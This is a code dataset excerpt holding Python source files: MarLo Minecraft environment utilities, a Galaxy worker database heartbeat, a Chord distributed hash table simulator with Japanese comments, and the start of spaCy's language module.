source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
utils.py
|
#!/usr/bin/env python
import gym
import marlo
import sys
import os
import importlib
import logging
logger = logging.getLogger(__name__)
from threading import Thread
from queue import Queue
import socket
from contextlib import closing
from marlo.launch_minecraft_in_background import launch_minecraft_in_background
def register_environments(MARLO_ENV_PATHS):
"""Searches for Marlo Environments in the provided paths, and registers
them as valid MarLo environments to be used by `marlo.make`.
Expect that each env directory will have the relevant
gym registrations implemented in ``__init__.py``
and a ``main.py`` will implement a derived class of
:class:`marlo.base_env_builder.MarloEnvBuilderBase` with the necessary
functions overriden.
:param MARLO_ENV_PATHS: Path to directory containing multiple MarLo envs
:type number_of_clients: str
:rtype: None
"""
for env_path in MARLO_ENV_PATHS:
sys.path.append(env_path)
for _marlo_env_dir in os.listdir(env_path):
"""
Expect that each env directory will have the relevant
gym registrations implemented in __init__.py
and a `main.py` will implement a derived class of
:class:`marlo.base_env_builder.MarloEnvBuilderBase`.
"""
if os.path.isdir(os.path.join(env_path, _marlo_env_dir)) and \
not str(_marlo_env_dir).startswith("__"):
module = importlib.import_module(_marlo_env_dir)
module._register()
logger.debug("Creating envs from : {}".format(_marlo_env_dir))
def threaded(fn):
"""Implements the ``@marlo.threaded`` decorator to help easily run functions in a
separate thread. Useful in multiagent scenarios when we want to run
multiple blocking agents across different threads.
.. code-block:: python
import marlo
@marlo.threaded
def example_function(agent_id):
print("Agent-id : {}; sleeping for two seconds".format(agent_id))
time.sleep(2)
print("Exiting : {} ".format(agent_id))
thread_handler_1, _ = example_function(1)
thread_handler_2, _ = example_function(2)
thread_handler_1.join()
thread_handler_2.join()
print("Code Exit")
:param fn: Function defitnion
:type fn: func
:returns thread_handler to join the threads if required
"""
def wrap(queue, *args, **kwargs):
queue.put(fn(*args, **kwargs))
def call(*args, **kwargs):
queue = Queue()
job = Thread(target=wrap, args=(queue,) + args, kwargs=kwargs)
job.start()
return job, queue
return call
def find_free_port():
"""Find a random free port where a Minecraft Client can possibly be launched.
:rtype: `int`
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
def launch_clients(number_of_clients, replaceable=False):
"""Launches a series of Minecraft Client which can be used by
MarLo environments.
:param number_of_clients: Number of Minecraft Clients to launch
:type number_of_clients: int
:param replaceable: `replaceable` argument from `launchClient.sh` (TODO: Check with @Andre)
:type replaceable: bool
**Note** This is still in experimental phase, as this does not yet clean up
the processes after the code exits.
:returns: A valid `client_pool` object ( a `list` of `tuples`)
>>> import marlo
>>> client_pool = marlo.launch_clients(number_of_client=2)
>>> print(client_pool)
>>> [('127.0.0.1', 27655), ('127.0.0.1', 15438)]
"""
ports = [find_free_port() for _ in range(number_of_clients)]
MINECRAFT_ROOT = os.getenv("MALMO_MINECRAFT_ROOT")
if not MINECRAFT_ROOT:
raise Exception("Please set the environment variable"
"`MALMO_MINECRAFT_ROOT` as the root of your "
"Minecraft Directory")
launch_processes = launch_minecraft_in_background(
MINECRAFT_ROOT,
ports,
replaceable=False
)
client_pool = [('127.0.0.1', port) for port in ports]
return client_pool
|
database_heartbeat.py
|
import datetime
import logging
import os
import socket
import threading
from galaxy.model import WorkerProcess
from galaxy.model.orm.now import now
log = logging.getLogger(__name__)
class DatabaseHeartbeat:
def __init__(self, application_stack, heartbeat_interval=60):
self.application_stack = application_stack
self.heartbeat_interval = heartbeat_interval
self.hostname = socket.gethostname()
self._is_config_watcher = False
self._observers = []
self.exit = threading.Event()
self.thread = None
self.active = False
self.pid = None
@property
def sa_session(self):
return self.application_stack.app.model.session
@property
def server_name(self):
# Application stack manipulates server name after forking
return self.application_stack.app.config.server_name
def start(self):
if not self.active:
self.thread = threading.Thread(target=self.send_database_heartbeat, name=f"database_heartbeart_{self.server_name}.thread")
self.thread.daemon = True
self.active = True
self.thread.start()
self.pid = os.getpid()
def shutdown(self):
self.active = False
self.exit.set()
if self.thread:
self.thread.join()
worker_process = self.worker_process
if worker_process:
self.sa_session.delete(worker_process)
self.sa_session.flush()
self.application_stack.app.queue_worker.send_control_task('reconfigure_watcher', noop_self=True)
def get_active_processes(self, last_seen_seconds=None):
"""Return all processes seen in ``last_seen_seconds`` seconds."""
if last_seen_seconds is None:
last_seen_seconds = self.heartbeat_interval
seconds_ago = now() - datetime.timedelta(seconds=last_seen_seconds)
return self.sa_session.query(WorkerProcess).filter(WorkerProcess.update_time > seconds_ago).all()
def add_change_callback(self, callback):
self._observers.append(callback)
@property
def is_config_watcher(self):
return self._is_config_watcher
@is_config_watcher.setter
def is_config_watcher(self, value):
self._is_config_watcher = value
log.debug('%s %s config watcher', self.server_name, 'is' if self.is_config_watcher else 'is not')
for callback in self._observers:
callback(self._is_config_watcher)
@property
def worker_process(self):
return self.sa_session.query(WorkerProcess).with_for_update(of=WorkerProcess).filter_by(
server_name=self.server_name,
hostname=self.hostname,
).first()
def update_watcher_designation(self):
worker_process = self.worker_process
if not worker_process:
worker_process = WorkerProcess(server_name=self.server_name, hostname=self.hostname)
worker_process.update_time = now()
worker_process.pid = self.pid
self.sa_session.add(worker_process)
self.sa_session.flush()
# We only want a single process watching the various config files on the file system.
# We just pick the max server name for simplicity
is_config_watcher = self.server_name == max(
p.server_name for p in self.get_active_processes(self.heartbeat_interval + 1))
if is_config_watcher != self.is_config_watcher:
self.is_config_watcher = is_config_watcher
def send_database_heartbeat(self):
if self.active:
while not self.exit.is_set():
self.update_watcher_designation()
self.exit.wait(self.heartbeat_interval)
|
chord_sim.py
|
# coding:utf-8
import threading
from threading import Thread
import time
import random
from typing import List, Optional, Union, cast
import modules.gval as gval
from modules.node_info import NodeInfo
from modules.chord_util import ChordUtil, KeyValue, DataIdAndValue, ErrorCode, PResult, NodeIsDownedExceptiopn, InternalControlFlowException
from modules.chord_node import ChordNode
from modules.stabilizer import Stabilizer
# ネットワークに存在するノードから1ノードをランダムに取得する
# is_aliveフィールドがFalseとなっているダウン状態となっているノードは返らない
def get_a_random_node() -> ChordNode:
with gval.lock_of_all_node_dict:
alive_nodes_list : List[ChordNode] = list(
filter(lambda node: node.is_alive == True and node.is_join_op_finished == True, list(gval.all_node_dict.values()))
)
return ChordUtil.get_random_elem(alive_nodes_list)
# stabilize_successorの呼び出しが一通り終わったら確認するのに利用する
# ランダムに選択したノードからsuccessor方向にsuccessorの繋がりでノードを辿って
# 行って各ノードの情報を出力する
# また、predecessorの方向にpredecesorの繋がりでもたどって出力する
def check_nodes_connectivity():
ChordUtil.dprint("check_nodes_connectivity_1")
print("flush", flush=True)
counter : int = 0
# まずはsuccessor方向に辿る
cur_node_info : NodeInfo = get_a_random_node().node_info
start_node_info : NodeInfo = cur_node_info
# ノードの総数(is_aliveフィールドがFalseのものは除外して算出)
with gval.lock_of_all_node_dict:
all_node_num = len(list(filter(lambda node: node.is_alive == True ,list(gval.all_node_dict.values()))))
ChordUtil.print_no_lf("check_nodes_connectivity__succ,all_node_num=" + str(all_node_num) + ",already_born_node_num=" + str(gval.already_born_node_num))
print(",", flush=True, end="")
while counter < all_node_num:
ChordUtil.print_no_lf(str(cur_node_info.born_id) + "," + ChordUtil.conv_id_to_ratio_str(cur_node_info.node_id) + " -> ")
# 各ノードはsuccessorの情報を保持しているが、successorのsuccessorは保持しないようになって
# いるため、単純にsuccessorのチェーンを辿ることはできないため、各ノードから最新の情報を
# 得ることに対応する形とする
# try:
#cur_node_info = ChordUtil.get_node_by_address(cur_node_info.address_str).node_info.successor_info_list[0]
ret = ChordUtil.get_node_by_address(cur_node_info.address_str)
if (ret.is_ok):
cur_node_info : 'NodeInfo' = cast('ChordNode', ret.result).node_info.successor_info_list[0]
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
if cast(int, ret.err_code) == ErrorCode.NodeIsDownedException_CODE:
print("")
ChordUtil.dprint("check_nodes_connectivity__succ,NODE_IS_DOWNED")
return
else: #cast(int, ret.err_code) == ErrorCode.InternalControlFlowException_CODE
# join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# TargetNodeDoesNotExistExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_successorはあきらめる
print("")
ChordUtil.dprint("check_nodes_connectivity__succ,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
return
# except NodeIsDownedExceptiopn:
# print("")
# ChordUtil.dprint("check_nodes_connectivity__succ,NODE_IS_DOWNED")
# return
# except InternalControlFlowException:
# # join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# # TargetNodeDoesNotExistExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_successorはあきらめる
# print("")
# ChordUtil.dprint("check_nodes_connectivity__succ,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
# return
if cur_node_info == None:
print("", flush=True, end="")
raise Exception("no successor having node was detected!")
counter += 1
print("")
# 2ノード目が参加して以降をチェック対象とする
# successorを辿って最初のノードに戻ってきているはずだが、そうなっていない場合は successorの
# チェーン構造が正しく構成されていないことを意味するためエラーとして終了する
if all_node_num >=2 and cur_node_info.node_id != start_node_info.node_id:
ChordUtil.dprint("check_nodes_connectivity_succ_err,chain does not includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# raise exception("SUCCESSOR_CHAIN_IS_NOT_CONSTRUCTED_COLLECTLY")
else:
ChordUtil.dprint("check_nodes_connectivity_succ_success,chain includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# 続いてpredecessor方向に辿る
counter = 0
cur_node_info = get_a_random_node().node_info
start_node_info = cur_node_info
ChordUtil.print_no_lf("check_nodes_connectivity__pred,all_node_num=" + str(all_node_num) + ",already_born_node_num=" + str(gval.already_born_node_num))
print(",", flush=True, end="")
while counter < all_node_num:
ChordUtil.print_no_lf(str(cur_node_info.born_id) + "," + ChordUtil.conv_id_to_ratio_str(cur_node_info.node_id) + " -> ")
# try:
#cur_node_info = ChordUtil.get_node_by_address(cur_node_info.address_str).node_info.predecessor_info
ret = ChordUtil.get_node_by_address(cur_node_info.address_str)
if (ret.is_ok):
cur_node_info: 'ChordNode' = cast('ChordNode', ret.result).node_info.predecessor_info
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
if cast(int, ret.err_code) == ErrorCode.NodeIsDownedException_CODE:
print("")
ChordUtil.dprint("check_nodes_connectivity__pred,NODE_IS_DOWNED")
return
else: #cast(int, ret.err_code) == ErrorCode.InternalControlFlowException_CODE
# join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# TargetNodeDoesNotExistExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_successorはあきらめる
print("")
ChordUtil.dprint("check_nodes_connectivity__pred,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
return
# except NodeIsDownedExceptiopn:
# print("")
# ChordUtil.dprint("check_nodes_connectivity__pred,NODE_IS_DOWNED")
# return
# except InternalControlFlowException:
# # join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# # TargetNodeDoesNotExistExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_successorはあきらめる
# print("")
# ChordUtil.dprint("check_nodes_connectivity__pred,TARGET_NODE_DOES_NOT_EXIST_EXCEPTION_IS_RAISED")
# return
if cur_node_info == None:
# 先を追っていけないのでチェックを終了する
ChordUtil.dprint("check_nodes_connectivity__pred,PREDECESSOR_INFO_IS_NONE")
return
counter += 1
print("")
# 2ノード目から本来チェック可能であるべきだが、stabilize処理の実行タイミングの都合で
# 2ノード目がjoinした後、いくらかpredecessorがNoneの状態が生じ、そのタイミングで本チェックが走る場合が
# あり得るため、余裕を持たせて5ノード目以降からチェックする
# successorを辿って最初のノードに戻ってきているはずだが、そうなっていない場合は successorの
# チェーン構造が正しく構成されていないことを意味するためエラーとして終了する
if all_node_num >=5 and cur_node_info.node_id != start_node_info.node_id:
ChordUtil.dprint("check_nodes_connectivity_pred_err,chain does not includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# raise Exception("PREDECESSOR_CHAIN_IS_NOT_CONSTRUCTED_COLLECTLY")
else:
ChordUtil.dprint("check_nodes_connectivity_pred_success,chain includes all node. all_node_num = "
+ str(all_node_num) + ","
+ ChordUtil.gen_debug_str_of_node(start_node_info) + ","
+ ChordUtil.gen_debug_str_of_node(cur_node_info))
# TODO: 実システム化する際は、リトライ処理は各オペレーションに対応するRESTインタフェースの呼び出し
# の中で行う形に書き直す必要あり
# ランダムに仲介ノードを選択し、そのノードに仲介してもらう形でネットワークに参加させる
def add_new_node():
# # ロックの取得
# gval.lock_of_all_data.acquire()
if Stabilizer.need_join_retry_node != None:
# 前回の呼び出しが失敗していた場合はリトライを行う
tyukai_node = cast('ChordNode', Stabilizer.need_join_retry_tyukai_node)
new_node = cast('ChordNode', Stabilizer.need_join_retry_node)
new_node.stabilizer.join(tyukai_node.node_info.address_str)
if Stabilizer.need_join_retry_node == None:
# リトライ情報が再設定されていないためリトライに成功したと判断
ChordUtil.dprint(
"add_new_node_1,retry of join is succeeded," + ChordUtil.gen_debug_str_of_node(new_node.node_info))
else:
ChordUtil.dprint(
"add_new_node_2,retry of join is failed," + ChordUtil.gen_debug_str_of_node(new_node.node_info))
else:
tyukai_node = get_a_random_node()
new_node = ChordNode(tyukai_node.node_info.address_str)
if Stabilizer.need_join_retry_node == None:
# join処理(リトライ時以外はChordNodeクラスのコンストラクタ内で行われる)が成功していれば
gval.all_node_dict[new_node.node_info.address_str] = new_node
# join処理のうち、ネットワーク参加時に必ずしも完了していなくてもデータの整合性やネットワークの安定性に
# に問題を生じさせないような処理をここで行う(当該処理がノード内のタスクキューに入っているのでそれを実行する形にする)
new_node.tqueue.exec_first()
# # ロックの解放
# gval.lock_of_all_data.release()
def do_stabilize_successor_th(node_list : List[ChordNode]):
for times in range(0, gval.STABILIZE_SUCCESSOR_BATCH_TIMES):
for node in node_list:
# try:
#node.stabilizer.stabilize_successor()
ret = node.stabilizer.stabilize_successor()
if (ret.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# InternalCtronlFlowExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_finger_tableはあきらめる
ChordUtil.dprint(
"do_stabilize_successor_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
+ ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# # InternalCtronlFlowExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_finger_tableはあきらめる
# ChordUtil.dprint(
# "do_stabilize_successor_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
# + ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
def do_stabilize_ftable_th(node_list : List[ChordNode]):
for times in range(0, gval.STABILIZE_FTABLE_BATCH_TIMES):
for table_idx in range(0, gval.ID_SPACE_BITS):
for node in node_list:
# try:
#node.stabilizer.stabilize_finger_table(table_idx)
ret = node.stabilizer.stabilize_finger_table(table_idx)
if (ret.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# InternalCtronlFlowExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_finger_tableはあきらめる
ChordUtil.dprint(
"do_stabilize_ftable_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
+ ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # join中のノードのノードオブジェクトを get_node_by_address しようとした場合に
# # InternalCtronlFlowExceptionがraiseされてくるのでその場合は、対象ノードのstabilize_finger_tableはあきらめる
# ChordUtil.dprint(
# "do_stabilize_ftable_th," + ChordUtil.gen_debug_str_of_node(node.node_info)
# + ",STABILIZE_FAILED_DUE_TO_INTERNAL_CONTROL_FLOW_EXCEPTION_RAISED")
def do_stabilize_onace_at_all_node_successor(node_list : List[ChordNode]) -> List[Thread]:
list_len = len(node_list)
range_start = 0
# 小数点以下切り捨て
basic_pass_node_cnt = int(list_len / gval.STABILIZE_THREAD_NUM)
thread_list : List[Thread] = []
for thread_idx in range(0, gval.STABILIZE_THREAD_NUM):
if thread_idx == gval.STABILIZE_THREAD_NUM - 1:
thread = threading.Thread(target=do_stabilize_successor_th, name="successor-" + str(thread_idx),
args=([node_list[range_start:-1]]))
else:
thread = threading.Thread(target=do_stabilize_successor_th, name="successor-" + str(thread_idx),
args=([node_list[range_start:range_start + basic_pass_node_cnt]]))
range_start += basic_pass_node_cnt
thread.start()
thread_list.append(thread)
return thread_list
def do_stabilize_onace_at_all_node_ftable(node_list : List[ChordNode]) -> List[Thread]:
list_len = len(node_list)
range_start = 0
# 小数点以下切り捨て
basic_pass_node_cnt = int(list_len / gval.STABILIZE_THREAD_NUM)
thread_list : List[Thread] = []
for thread_idx in range(0, gval.STABILIZE_THREAD_NUM):
if thread_idx == gval.STABILIZE_THREAD_NUM - 1:
thread = threading.Thread(target=do_stabilize_ftable_th, name="ftable-" + str(thread_idx),
args=([node_list[range_start:-1]]))
else:
thread = threading.Thread(target=do_stabilize_successor_th, name="ftable-" + str(thread_idx),
args=([node_list[range_start:range_start + basic_pass_node_cnt]]))
range_start += basic_pass_node_cnt
thread.start()
thread_list.append(thread)
return thread_list
# all_node_id辞書のvaluesリスト内から重複なく選択したノードに stabilize のアクションをとらせていく
def do_stabilize_once_at_all_node():
ChordUtil.dprint("do_stabilize_once_at_all_node_0,START")
with gval.lock_of_all_node_dict:
node_list = list(gval.all_node_dict.values())
shuffled_node_list : List[ChordNode] = random.sample(node_list, len(node_list))
thread_list_succ : List[Thread] = do_stabilize_onace_at_all_node_successor(shuffled_node_list)
thread_list_ftable : List[Thread] = do_stabilize_onace_at_all_node_ftable(shuffled_node_list)
# 全てのスレッドが終了するまで待つ
# 一つの呼び出しごとにブロックするが、その間に別にスレッドが終了しても
# スレッドの処理が終了していることは担保できるため問題ない
for thread in thread_list_succ:
thread.join()
for thread in thread_list_ftable:
thread.join()
check_nodes_connectivity()
# 適当なデータを生成し、IDを求めて、そのIDなデータを担当するChordネットワーク上のノードの
# アドレスをよろしく解決し、見つかったノードにputの操作を依頼する
def do_put_on_random_node():
# # ロックの取得
# gval.lock_of_all_data.acquire()
is_retry = False
if ChordNode.need_put_retry_data_id != -1:
# 前回の呼び出し時に global_putが失敗しており、リトライが必要
is_retry = True
# key と value の値は共通としているため、記録してあった value の値を key としても用いる
kv_data = KeyValue(ChordNode.need_put_retry_data_value, ChordNode.need_put_retry_data_value)
# data_id は乱数で求めるというインチキをしているため、記録してあったもので上書きする
kv_data.data_id = ChordNode.need_put_retry_data_id
node = cast('ChordNode', ChordNode.need_put_retry_node)
else:
# ミリ秒精度で取得したUNIXTIMEを文字列化してkeyに用いる
unixtime_str = str(time.time())
# valueは乱数を生成して、それを16進表示したもの
random_num = random.randint(0, gval.ID_SPACE_RANGE - 1)
kv_data = KeyValue(unixtime_str, hex(random_num))
# データの更新を行った場合のget時の整合性のチェックのため2回に一回はput済みの
# データのIDを keyとして用いる
if gval.already_issued_put_cnt % 2 != 0:
random_kv_elem : 'KeyValue' = ChordUtil.get_random_data()
data_id = random_kv_elem.data_id
kv_data.data_id = data_id
node = get_a_random_node()
# 成功した場合はTrueが返るのでその場合だけ all_data_listに追加する
if node.endpoints.rrpc__global_put(cast(int, kv_data.data_id), kv_data.value_data):
with gval.lock_of_all_data_list:
gval.all_data_list.append(kv_data)
if is_retry:
if ChordNode.need_put_retry_data_id == -1:
# リトライ情報が再設定されていないためリトライに成功したと判断
ChordUtil.dprint(
"do_put_on_random_node_1,retry of global_put is succeeded," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(cast(int, kv_data.data_id)))
else:
ChordUtil.dprint(
"do_put_on_random_node_2,retry of global_put is failed," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(cast(int, kv_data.data_id)))
# # ロックの解放
# gval.lock_of_all_data.release()
# グローバル変数であるall_data_listからランダムにデータを選択し、そのデータのIDから
# Chordネットワーク上の担当ノードのアドレスをよろしく解決し、見つかったノードにgetの操作を依頼する
def do_get_on_random_node():
# # ロックの取得
# gval.lock_of_all_data.acquire()
# まだ put が行われていなかったら何もせずに終了する
with gval.lock_of_all_data_list:
if len(gval.all_data_list) == 0:
# gval.lock_of_all_data.release()
return
is_retry = False
if ChordNode.need_getting_retry_data_id != -1:
# doing retry
#リトライを行うためカウンタをインクリメントする
gval.global_get_retry_cnt += 1
# リトライ回数が規定回数に達したらデータの所在を出力する
if gval.global_get_retry_cnt == gval.GLOBAL_GET_RETRY_CNT_LIMIT_TO_DEBEUG_PRINT:
ChordUtil.print_data_placement_info(ChordNode.need_getting_retry_data_id, after_notfound_limit=True)
else:
ChordUtil.print_data_placement_info(ChordNode.need_getting_retry_data_id)
is_retry = True
target_data_id = ChordNode.need_getting_retry_data_id
node = cast('ChordNode', ChordNode.need_getting_retry_node)
else:
#リトライではない (リトライが無事終了した場合を含む) ためカウンタをリセットする
gval.global_get_retry_cnt = 0
with gval.lock_of_all_data_list:
target_data = ChordUtil.get_random_elem(gval.all_data_list)
target_data_id = target_data.data_id
# ログの量の増加が懸念されるが global_getを行うたびに、取得対象データの所在を出力する
ChordUtil.print_data_placement_info(target_data_id)
node = get_a_random_node()
got_result : str = node.endpoints.rrpc__global_get(target_data_id)
# 関数内関数
def print_data_consistency():
# TODO: gval.all_data_list は 検索のコストを考えると dict にした方がいいかも
# at do_get_on_random_node
with gval.lock_of_all_data_list:
for idx in reversed(range(0, len(gval.all_data_list))):
if gval.all_data_list[idx].data_id == target_data_id:
latest_elem = gval.all_data_list[idx]
if got_result == latest_elem.value_data:
ChordUtil.dprint(
"do_get_on_random_node_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id) + ","
+ got_result
+ ",OK_GOT_VALUE_WAS_LATEST")
else:
ChordUtil.dprint(
"do_get_on_random_node_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id) + ","
+ got_result
+ ",WARN__GOT_VALUE_WAS_INCONSISTENT")
if is_retry:
if ChordNode.need_getting_retry_data_id == -1:
# リトライ情報が再設定されていないためリトライに成功したと判断
print_data_consistency()
ChordUtil.dprint(
"do_get_on_random_node_2,retry of global_get is succeeded," + ChordUtil.gen_debug_str_of_node(
node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id))
else:
ChordUtil.dprint(
"do_get_on_random_node_2,retry of global_get is failed," + ChordUtil.gen_debug_str_of_node(
node.node_info) + ","
+ ChordUtil.gen_debug_str_of_data(target_data_id))
else:
if ChordNode.need_getting_retry_data_id == -1:
# global_getが成功していた場合のみチェックを行う
print_data_consistency()
# # ロックの解放
# gval.lock_of_all_data.release()
# グローバル変数であるall_node_dictからランダムにノードを選択し
# ダウンさせる(is_aliveフィールドをFalseに設定する)
def do_kill_a_random_node():
# # ロックの取得
# gval.lock_of_all_data.acquire()
node = get_a_random_node()
# if node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# ChordUtil.dprint(
# "do_kill_a_random_node_0_1," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
# if node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# node.node_info.lock_of_pred_info.release()
# ChordUtil.dprint(
# "do_kill_a_random_node_0_2," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
# if node.node_info.lock_of_datastore.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
# node.node_info.lock_of_pred_info.release()
# node.node_info.lock_of_succ_infos.release()
# ChordUtil.dprint(
# "do_kill_a_random_node_0_3," + ChordUtil.gen_debug_str_of_node(node.node_info) + ","
# + "LOCK_ACQUIRE_TIMEOUT")
# return
try:
with gval.lock_of_all_node_dict:
if len(gval.all_node_dict) > 10 \
and (ChordNode.need_getting_retry_data_id == -1
and ChordNode.need_put_retry_data_id == -1
and Stabilizer.need_join_retry_node == None):
node.is_alive = False
ChordUtil.dprint(
"do_kill_a_random_node_1,"
+ ChordUtil.gen_debug_str_of_node(node.node_info))
with node.node_info.lock_of_datastore:
for key, value in node.data_store.stored_data.items():
data_id: str = key
sv_entry : DataIdAndValue = value
ChordUtil.dprint("do_kill_a_random_node_2,"
+ ChordUtil.gen_debug_str_of_node(node.node_info) + ","
+ hex(int(data_id)) + "," + hex(sv_entry.data_id))
finally:
# node.node_info.lock_of_datastore.release()
# node.node_info.lock_of_succ_infos.release()
# node.node_info.lock_of_pred_info.release()
pass
# # ロックの解放
# gval.lock_of_all_data.release()
# TODO: 対応する処理を行うスクリプトの類が必要 node_join_th
def node_join_th():
while gval.already_born_node_num < gval.NODE_NUM_MAX:
if gval.already_born_node_num == gval.KEEP_NODE_NUM:
time.sleep(60.0)
gval.is_network_constructed = True
gval.JOIN_INTERVAL_SEC = 120.0 #20.0
# # TODO: デバッグのために1000ノードに達したらjoinを止める。後で元に戻すこと!
# # at node_join_th
# break
add_new_node()
time.sleep(gval.JOIN_INTERVAL_SEC)
def stabilize_th():
while True:
# 内部で適宜ロックを解放することで他のスレッドの処理も行えるようにしつつ
# 呼び出し時点でのノードリストを対象に stabilize 処理を行う
do_stabilize_once_at_all_node()
# TODO: RESTでエンドポイントを叩くテストプログラムが必要 data_put_th
def data_put_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
do_put_on_random_node()
time.sleep(gval.PUT_INTERVAL_SEC)
# TODO: RESTでエンドポイントを叩くテストプログラムが必要 data_get_th
def data_get_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
# 内部でデータのputが一度も行われていなければreturnしてくるので
# putを行うスレッドと同時に動作を初めても問題ないようにはなっている
do_get_on_random_node()
# エンドレスで行うのでデバッグプリントのサイズが大きくなり過ぎないよう
# sleepを挟む
time.sleep(gval.GET_INTERVAL_SEC)
# TODO: 適当に選んだプロセスをkillするスクリプトなりが必要 node_kill_th
def node_kill_th():
while gval.is_network_constructed == False:
time.sleep(1)
while True:
# # ネットワークに存在するノードが10ノードを越えたらノードをダウンさせる処理を有効にする
# # しかし、リトライされなければならない処理が存在した場合および partial_join_opの実行が必要なノードが
# # 存差異する場合は抑制する
# if len(gval.all_node_dict) > 10 \
# and (ChordNode.need_getting_retry_data_id == -1
# and ChordNode.need_put_retry_data_id == -1
# and Stabilizer.need_join_retry_node == None
# and gval.is_waiting_partial_join_op_exists == False) :
# do_kill_a_random_node()
do_kill_a_random_node()
time.sleep(gval.NODE_KILL_INTERVAL_SEC)
def main():
# result1 : PResult[Optional[NodeInfo]] = ChordUtil.generic_test_ok(NodeInfo())
# print(result1)
# result2 : PResult[Optional[NodeInfo]] = ChordUtil.generic_test_err(ErrorCode.NodeIsDownedException_CODE)
# print(result2)
#
# ret = ChordUtil.generic_test_ok(NodeInfo())
# if ret.is_ok:
# casted_ret : 'NodeInfo' = cast('NodeInfo', ret.result)
# print("Ok")
# else:
# casted_ret: int = cast(int, ret.err_code)
# print(casted_ret)
#
# ret = ChordUtil.generic_test_err(ErrorCode.NodeIsDownedException_CODE)
# if ret.is_ok:
# casted_ret : 'NodeInfo' = print(cast('NodeInfo', ret.result))
# print("Ok")
# else:
# casted_ret : int = cast(int, ret.err_code)
# print(casted_ret)
# 再現性のため乱数シードを固定
# ただし、複数スレッドが存在し、個々の処理の終了するタイミングや、どのタイミングで
# スイッチするかは実行毎に異なる可能性があるため、あまり意味はないかもしれない
random.seed(1337)
# 最初の1ノードはここで登録する
first_node = ChordNode("THIS_VALUE_IS_NOT_USED", first_node=True)
first_node.is_join_op_finished = True
gval.all_node_dict[first_node.node_info.address_str] = first_node
time.sleep(0.5) #次に生成するノードが同一のアドレス文字列を持つことを避けるため
node_join_th_handle = threading.Thread(target=node_join_th, daemon=True)
node_join_th_handle.start()
stabilize_th_handle = threading.Thread(target=stabilize_th, daemon=True)
stabilize_th_handle.start()
data_put_th_handle = threading.Thread(target=data_put_th, daemon=True)
data_put_th_handle.start()
data_get_th_handle = threading.Thread(target=data_get_th, daemon=True)
data_get_th_handle.start()
node_kill_th_handle = threading.Thread(target=node_kill_th, daemon=True)
node_kill_th_handle.start()
while True:
time.sleep(1)
if __name__ == '__main__':
main()
|
language.py
|
# coding: utf8
from __future__ import absolute_import, unicode_literals
import random
import itertools
from spacy.util import minibatch
import weakref
import functools
from collections import OrderedDict
from contextlib import contextmanager
from copy import copy, deepcopy
from thinc.neural import Model
import srsly
import multiprocessing as mp
from itertools import chain, cycle
from .tokenizer import Tokenizer
from .vocab import Vocab
from .lemmatizer import Lemmatizer
from .lookups import Lookups
from .pipeline import DependencyParser, Tagger
from .pipeline import Tensorizer, EntityRecognizer, EntityLinker
from .pipeline import SimilarityHook, TextCategorizer, Sentencizer
